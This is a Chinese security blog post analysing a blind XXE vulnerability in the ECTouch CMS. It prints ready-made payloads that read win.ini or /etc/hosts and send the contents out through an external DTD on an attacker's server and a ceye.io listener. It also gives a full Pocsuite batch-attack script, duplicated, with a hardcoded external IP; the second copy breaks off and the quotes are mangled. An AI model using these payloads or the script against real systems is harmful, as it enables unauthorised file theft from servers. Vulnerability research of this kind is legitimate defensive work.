ECTouch xxe漏洞分析-安全小百科

0x00 前言

在安全客上看到有人在审这个cms，在文章末尾给出了可能存在xxe漏洞，最近也在写pocsuite的插件，所以想就这个xxe漏洞来编写自动脚本。

安全客文章链接：https://www.anquanke.com/post/id/169152

cms下载地址：https://github.com/mstxq17/CodeCheck/

cms其实存在多个xxe漏洞，根源就是滥用simplexml_load_string函数，同时没有关闭实体解析，但是在测试时候发现simplexml_load_string函数如果第三个参数不为“LIBXML_NOENT”的话是不会解析的，因此这个漏洞只适用于php5.3-5.4的版本。

0x01 漏洞分析

这里好就好在这个漏洞是前台的漏洞，并且在默认配置就能触发。

漏洞代码位于ECTouch/include/default/controllers/WechatController.class.php第39行

这里由于是construct函数，因此在加载这个类的时候会自动加载，重点看这里首先需要传入一个orgid的参数，但是这个参数不影响流程，因此带上即可

这里获取wxinfo，由于没有配置，因此都会为空，但是没有退出流程的操作，所以也不用理会，38行开始实例化Wechat这个类，然后调用这个类当中的valid函数

我们跟进这个valid函数去看看，代码位于ECTouch/vendor/libraies/Wechat.php第266行

这里可以看到使用post方式，然后将post的数据传入到postStr参数中，最后进入到simplexml_load_string函数中去

但是唯一的问题就是这里没有回显，因此这里其实存在的盲xxe漏洞

另外还有个问题就是这里高版本的simplexml_load_string当第三个参数不为”LIBXML_NOENT”参数时是不会解析xml的，因此这里如果想利用就只能攻击php班博文为5.3-5.4的服务器

0x02 payload解析

payload其实网上公开的盲xxe都很类似，这里就直接用现成的就好

<br />
POST:<br />
<?xml version=”1.0″ encoding=”utf-8″?><!DOCTYPE data [ <!ENTITY % file SYSTEM “php://filter/read=convert.base64-encode/resource=file:///c://windows/win.ini”><!ENTITY % dtd SYSTEM “http://远端vps的ip/xxe.xml”>%dtd; %all;]><value>&send;</value></p>
<p>vps上的xxe.xml:<br />
<!ENTITY % all “<!ENTITY send SYSTEM ‘http://blindxxe.d61fgi.ceye.io/%file;’>”></p>
<p>//这里使用了ceye的接口来传输获得文件信息

POST:

<?xml version=“1.0” encoding=“utf-8”?><!DOCTYPE data [ <!ENTITY % file SYSTEM “php://filter/read=convert.base64-encode/resource=file:///c://windows/win.ini”><!ENTITY % dtd SYSTEM “http://远端vps的ip/xxe.xml”>%dtd; %all;]><value>&send;</value>

vps上的xxe.xml:

<!ENTITY % all “<!ENTITY send SYSTEM ‘http://blindxxe.d61fgi.ceye.io/%file;’>”>

//这里使用了ceye的接口来传输获得文件信息

最终攻击的payload就是/index.php?m=default&c=wechat&a=index&orgid=1

然后传入POST数据，同时在vps上配置好xml文件即可，我这里使用ceye来传输接口，同时也可以在远端vps上监听1234端口，用于接收数据

0x03 检测脚本编写

这里构造批量脚本的思路是利用xxe漏洞获取数据，然后将数据回传到ceye上，每次攻击请求之后就访问ceye的api接口，接口的第一个数据即为最新数据，那么比较下请求前和请求后的api id即可，如果发生变化，那么说明接收到了数据，也就表明攻击成功了。

<br />
#!/usr/bin/python<br />
# -*- coding: utf-8 -*-</p>
<p># If you have issues about development, please read:<br />
# https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md<br />
# https://github.com/knownsec/Pocsuite/blob/master/docs/COPYING</p>
<p>import string<br />
import random<br />
import time<br />
import json<br />
from pocsuite.net import req<br />
from pocsuite.poc import POCBase, Output<br />
from pocsuite.utils import register</p>
<p>def post_url(url, payload):<br />
    try:<br />
        httpreq = req.Session()<br />
        headers = {<br />
        “User-Agent” : “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0”,<br />
        “Accept” : “text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”,<br />
        “Accept-Language” : “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,<br />
        }<br />
        resp = httpreq.post(url, data=payload)<br />
    except Exception as ex:<br />
        resp = None<br />
    return resp</p>
<p>def get_id():<br />
    url = ‘http://api.ceye.io/v1/records?token=your token&type=http&filter=url filter’<br />
    //这里就是ceye的api接口,下面给个案例，这里回传的数据为http://blindxxe.d61fgi.ceye.io/%file，因此匹配blindxxe域名接收到的数据即可<br />
    //url = ‘http://api.ceye.io/v1/records?token=12345678&type=http&filter=blindxxe’<br />
    try:<br />
        httpreq = req.Session()<br />
        headers = {<br />
        “User-Agent” : “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0”,<br />
        “Accept” : “text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”,<br />
        “Accept-Language” : “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2″,<br />
        }<br />
        resp = httpreq.get(url=url)<br />
        resp_json = json.loads(resp.content)<br />
        first_id = resp_json[‘data’][0][‘id’]<br />
    except Exception as ex:<br />
        first_id = 0<br />
    return first_id</p>
<p>class TestPOC(POCBase):<br />
    name = ‘ECTOUCH Core 2.7.2 – Blind XXE’<br />
    vulID = ”<br />
    author = [‘adog’]<br />
    vulType = ‘blind-xxe’<br />
    version = ‘1.0’    # default version: 1.0<br />
    references = [”]<br />
    desc = ”’ECTOUCH Core 2.7.2 – Blind XXE<br />
    PoC Exploit (default configuration, no plugins, no auth)”’</p>
<p>    vulDate = ‘2019-01-06’<br />
    createDate = ‘2019-01-07’<br />
    updateDate = ‘2019-01-07’</p>
<p>    appName = ‘ECTOUCH’<br />
    appVersion = ‘2.7.2’<br />
    appPowerLink = ‘http://www.ectouch.cn’<br />
    samples = [”]</p>
<p>    def _attack(self):<br />
        “””attack mode”””<br />
        return self._verify()</p>
<p>    def _verify(self):<br />
        “””verify mode”””<br />
        result = {}<br />
        init_id = get_id()<br />
        self.url = self.url + ‘/index.php?m=default&c=wechat&a=index&orgid=1’<br />
        payload_win = ‘<?xml version=”1.0″ encoding=”utf-8″?><!DOCTYPE data [ <!ENTITY % file SYSTEM “php://filter/read=convert.base64-encode/resource=file:///c://windows/win.ini”><!ENTITY % dtd SYSTEM “http://118.25.103.184/cisp-pte/xxe.xml”>%dtd; %all;]><value>&send;</value>’<br />
        payload_linux = ‘<?xml version=”1.0″ encoding=”utf-8″?><!DOCTYPE data [ <!ENTITY % file SYSTEM “php://filter/read=convert.base64-encode/resource=file:///etc/hosts”><!ENTITY % dtd SYSTEM “http://118.25.103.184/cisp-pte/xxe.xml”>%dtd; %all;]><value>&send;</value>’<br />
        resp_win = post_url(self.url,payload_win)<br />
        resp_linux = post_url(self.url,payload_linux)<br />
        match_id = get_id()<br />
        time.sleep(1)<br />
        if init_id != match_id:<br />
            result[‘VerifyInfo’] = {}<br />
            result[‘VerifyInfo’][‘URL’] = self.url<br />
        return self.parse_output(result)</p>
<p>    def parse_output(self, result):<br />
        output = Output(self)<br />
        if result:<br />
            output.success(result)<br />
        else:<br />
            output.fail(‘Internet nothing returned’)<br />
        return output</p>
<p>register(TestPOC)

#!/usr/bin/python

# -*- coding: utf-8 -*-

# If you have issues about development, please read:

# https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md

# https://github.com/knownsec/Pocsuite/blob/master/docs/COPYING

import string

import random

import time

import json

from pocsuite.net import req

from pocsuite.poc import POCBase, Output

from pocsuite.utils import register

def post_url(url, payload):

try:

httpreq = req.Session()

headers = {

“User-Agent” : “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0”,

“Accept” : “text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”,

“Accept-Language” : “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,

}

resp = httpreq.post(url, data=payload)

except Exception as ex:

resp = None

return resp

def get_id():

url = ‘http://api.ceye.io/v1/records?token=your token&type=http&filter=url filter’

//这里就是ceye的api接口,下面给个案例，这里回传的数据为http://blindxxe.d61fgi.ceye.io/%file，因此匹配blindxxe域名接收到的数据即可

//url = ‘http://api.ceye.io/v1/records?token=12345678&type=http&filter=blindxxe’

try:

httpreq = req.Session()

headers = {

“User-Agent” : “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0”,

“Accept” : “text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”,

“Accept-Language” : “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,

}

resp = httpreq.get(url=url)

resp_json = json.loads(resp.content)

first_id = resp_json[‘data’][0][‘id’]

except Exception as ex:

first_id = 0

return first_id

class TestPOC(POCBase):

name = ‘ECTOUCH Core 2.7.2 – Blind XXE’

vulID = ”

author = [‘adog’]

vulType = ‘blind-xxe’

version = ‘1.0’ # default version: 1.0

references = [”]

desc = ”‘ECTOUCH Core 2.7.2 – Blind XXE

PoC Exploit (default configuration, no plugins, no auth)’”

vulDate = ‘2019-01-06’

createDate = ‘2019-01-07’

updateDate = ‘2019-01-07’

appName = ‘ECTOUCH’

appVersion = ‘2.7.2’

appPowerLink = ‘http://www.ectouch.cn’

samples = [”]

def _attack(self):

“”“attack mode”“”

return self._verify()

def _verify(self):

“”“verify mode”“”

result = {}

init_id = get_id()

self.url = self.url + ‘/index.php?m=default&c=wechat&a=index&orgid=1’

payload_win = ‘<?xml version=“1.0” encoding=“utf-8”?><!DOCTYPE data [ <!ENTITY % file SYSTEM “php://filter/read=convert.base64-encode/resource=file:///c://windows/win.ini”><!ENTITY % dtd SYSTEM “http://118.25.103.184/cisp-pte/xxe.xml”>%dtd; %all;]><value>&send;</value>’

payload_linux = ‘<?xml version=“1.0” encoding=“utf-8”?><!DOCTYPE data [ <!ENTITY % file SYSTEM “php://filter/read=convert.base64-encode/resource=file:///etc/hosts”><!ENTITY % dtd SYSTEM “http://118.25.103.184/cisp-pte/xxe.xml”>%dtd; %all;]><value>&send;</value>’

resp_win = post_url(self.url,payload_win)

resp_linux = post_url(self.url,payload_linux)

match_id = get_id()

time.sleep(1)

if init_id != match_id:

result[‘VerifyInfo’] = {}

result[‘VerifyInfo’][‘URL’] = self.url

return self.parse_output(result)

def parse_output(self, result):

output = Output(self)

if result:

output.success(result)